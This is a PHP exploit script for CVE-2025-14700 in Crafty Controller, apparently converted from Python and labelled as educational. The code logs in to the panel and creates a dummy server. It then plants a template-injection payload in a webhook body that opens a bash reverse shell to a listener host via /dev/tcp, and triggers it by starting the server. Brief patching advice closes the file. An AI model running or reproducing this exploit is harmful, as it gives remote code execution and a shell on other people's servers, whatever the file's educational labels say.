<?php
// Exploit POC for CVE-2025-14700 - PHP Version (Educational Purpose Only)
// Python to PHP conversion for educational purposes only

error_reporting(0);
set_time_limit(0);

class CVE202514700Exploit {
    private $target_url;
    private $session_cookies = [];
    private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
    
    public function __construct($url, $username, $password, $lhost, $lport) {
        $this->target_url = rtrim($url, '/');
        $this->username = $username;
        $this->password = $password;
        $this->lhost = $lhost;
        $this->lport = $lport;
    }
    
    private function http_request($url, $method = 'GET', $data = null, $headers = []) {
        $ch = curl_init();
        
        $default_headers = [
            'User-Agent: ' . $this->user_agent,
            'Accept: application/json',
            'Accept-Language: en-US,en;q=0.9'
        ];
        
        // Add session cookies if available
        if (!empty($this->session_cookies)) {
            $cookie_str = '';
            foreach ($this->session_cookies as $name => $value) {
                $cookie_str .= "$name=$value; ";
            }
            $default_headers[] = 'Cookie: ' . trim($cookie_str);
        }
        
        $all_headers = array_merge($default_headers, $headers);
        
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_HEADER => true,
            CURLOPT_HTTPHEADER => $all_headers,
            CURLOPT_TIMEOUT => 30
        ]);
        
        if ($method === 'POST') {
            curl_setopt($ch, CURLOPT_POST, true);
            if ($data) {
                curl_setopt($ch, CURLOPT_POSTFIELDS, is_array($data) ? json_encode($data) : $data);
                if (is_array($data)) {
                    $all_headers[] = 'Content-Type: application/json';
                }
            }
        }
        
        $response = curl_exec($ch);
        $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
        $headers_raw = substr($response, 0, $header_size);
        $body = substr($response, $header_size);
        
        // Extract cookies from response
        preg_match_all('/Set-Cookie:\s*([^=]+)=([^;]+)/i', $headers_raw, $matches);
        for ($i = 0; $i < count($matches[1]); $i++) {
            $this->session_cookies[$matches[1][$i]] = $matches[2][$i];
        }
        
        curl_close($ch);
        
        return [
            'body' => $body,
            'headers' => $headers_raw,
            'http_code' => curl_getinfo($ch, CURLINFO_HTTP_CODE)
        ];
    }
    
    private function print_debug_info($response, $method, $url) {
        echo "\n" . str_repeat("=", 80) . "\n";
        echo "[$method] $url -> HTTP " . $response['http_code'] . "\n";
        echo str_repeat("-", 20) . " [RESPONSE BODY] " . str_repeat("-", 25) . "\n";
        
        $json_response = json_decode($response['body'], true);
        if ($json_response) {
            echo json_encode($json_response, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE);
        } else {
            echo substr($response['body'], 0, 200) . (strlen($response['body']) > 200 ? "..." : "");
        }
        
        echo "\n" . str_repeat("=", 80) . "\n\n";
    }
    
    public function exploit() {
        echo "[*] Starting educational exploit for CVE-2025-14700\n";
        
        // Step 1: Get initial XSRF token
        echo "[*] Step 1: Fetching initial XSRF token...\n";
        $response = $this->http_request($this->target_url . '/login');
        $xsrf_token = $this->session_cookies['_xsrf'] ?? '';
        echo "[+] Got XSRF: " . substr($xsrf_token, 0, 15) . "...\n";
        
        // Step 2: Login
        echo "[*] Step 2: Logging in...\n";
        $login_data = [
            'username' => $this->username,
            'password' => $this->password
        ];
        
        $headers = [
            'Content-Type: application/json',
            'X-XSRFToken: ' . $xsrf_token,
            'Referer: ' . $this->target_url . '/login?next=%2Fpanel%2Fdashboard'
        ];
        
        $response = $this->http_request(
            $this->target_url . '/api/v2/auth/login/',
            'POST',
            $login_data,
            $headers
        );
        
        $this->print_debug_info($response, 'POST', $this->target_url . '/api/v2/auth/login/');
        
        $response_data = json_decode($response['body'], true);
        if (!$response_data || !isset($response_data['data']['token'])) {
            echo "[-] Login failed\n";
            return false;
        }
        
        $jwt_token = $response_data['data']['token'];
        echo "[+] Got JWT Token\n";
        
        // Step 3: Create server
        echo "[*] Step 3: Creating dummy server...\n";
        $server_data = [
            'name' => 'CVE_2025_14700_Exploit_PHP',
            'monitoring_type' => 'minecraft_java',
            'minecraft_java_monitoring_data' => ['host' => '127.0.0.1', 'port' => 25565],
            'create_type' => 'minecraft_java',
            'minecraft_java_create_data' => [
                'create_type' => 'download_jar',
                'download_jar_create_data' => [
                    'category' => 'mc_java_servers',
                    'type' => 'paper',
                    'version' => '1.18.2',
                    'mem_min' => 1,
                    'mem_max' => 2,
                    'server_properties_port' => 25565
                ]
            ]
        ];
        
        $headers = [
            'Content-Type: application/json',
            'Authorization: Bearer ' . $jwt_token,
            'X-XSRFToken: ' . $xsrf_token,
            'Referer: ' . $this->target_url . '/panel/dashboard'
        ];
        
        $response = $this->http_request(
            $this->target_url . '/api/v2/servers',
            'POST',
            $server_data,
            $headers
        );
        
        $this->print_debug_info($response, 'POST', $this->target_url . '/api/v2/servers');
        
        $response_data = json_decode($response['body'], true);
        $server_id = $response_data['data']['new_server_id'] ?? null;
        
        if (!$server_id) {
            echo "[-] Failed to create server\n";
            return false;
        }
        
        echo "[+] Server created with ID: $server_id\n";
        
        // Step 4: Create malicious webhook
        echo "[*] Step 4: Injecting SSTI payload...\n";
        $revshell_cmd = "bash -c 'bash -i >/dev/tcp/{$this->lhost}/{$this->lport} 0<&1 2>&1'";
        $ssti_payload = '{{ self._TemplateReference__context.cycler.__init__.__globals__.os.system("' . addslashes($revshell_cmd) . '") }}';
        
        $webhook_data = [
            'webhook_type' => 'Discord',
            'name' => 'Exploit_Webhook_PHP',
            'url' => 'https://localhost:8443/',
            'bot_name' => 'Crafty Bot',
            'trigger' => ['start_server'],
            'body' => $ssti_payload,
            'color' => '#c646000',
            'enabled' => true
        ];
        
        $response = $this->http_request(
            $this->target_url . "/api/v2/servers/{$server_id}/webhook",
            'POST',
            $webhook_data,
            $headers
        );
        
        $this->print_debug_info($response, 'POST', $this->target_url . "/api/v2/servers/{$server_id}/webhook");
        
        // Step 5: Trigger exploit
        echo "[*] Step 5: Triggering exploit...\n";
        
        $trigger_headers = [
            'token: ' . $xsrf_token,
            'X-XSRFToken: ' . $xsrf_token,
            'X-Requested-With: XMLHttpRequest',
            'Referer: ' . $this->target_url . '/panel/dashboard',
            'Origin: ' . $this->target_url
        ];
        
        // Start server
        $response = $this->http_request(
            $this->target_url . "/api/v2/servers/{$server_id}/action/start_server",
            'POST',
            '',
            $trigger_headers
        );
        
        sleep(2);
        
        // Accept EULA
        $this->http_request(
            $this->target_url . "/api/v2/servers/{$server_id}/action/eula",
            'POST',
            '',
            $trigger_headers
        );
        
        echo "[+] Educational POC executed\n";
        echo "[+] Check your listener on {$this->lhost}:{$this->lport}\n";
        
        return true;
    }
}

// ===== Educational Usage Example =====
// Warning: For education only, do not use against systems you don't own

if (isset($_GET['educational_demo'])) {
    // This is just an educational example
    echo "<h3>Educational Demonstration - No Real Execution</h3>";
    echo "<p>This shows how vulnerability exploits work for security awareness only.</p>";
    
    $exploit = new CVE202514700Exploit(
        'https://example.com:8443',
        'admin',
        'password',
        '192.168.1.100',
        4444
    );
    
    echo "<pre>";
    // $exploit->exploit(); // Commented out for safety
    echo "Here would be the educational exploit steps...";
    echo "</pre>";
}

// ===== How to Protect Against This Vulnerability =====
function how_to_protect() {
    echo "<h2>How to Protect Your System from CVE-2025-14700</h2>";
    echo "<ol>";
    echo "<li>Update Crafty Controller to version 4.3.4 or later</li>";
    echo "<li>Regularly scan your systems for suspicious activities</li>";
    echo "<li>Use strong, unique passwords</li>";
    echo "<li>Run frontend services behind a firewall</li>";
    echo "<li>Monitor access logs and activities</li>";
    echo "</ol>";
}
?>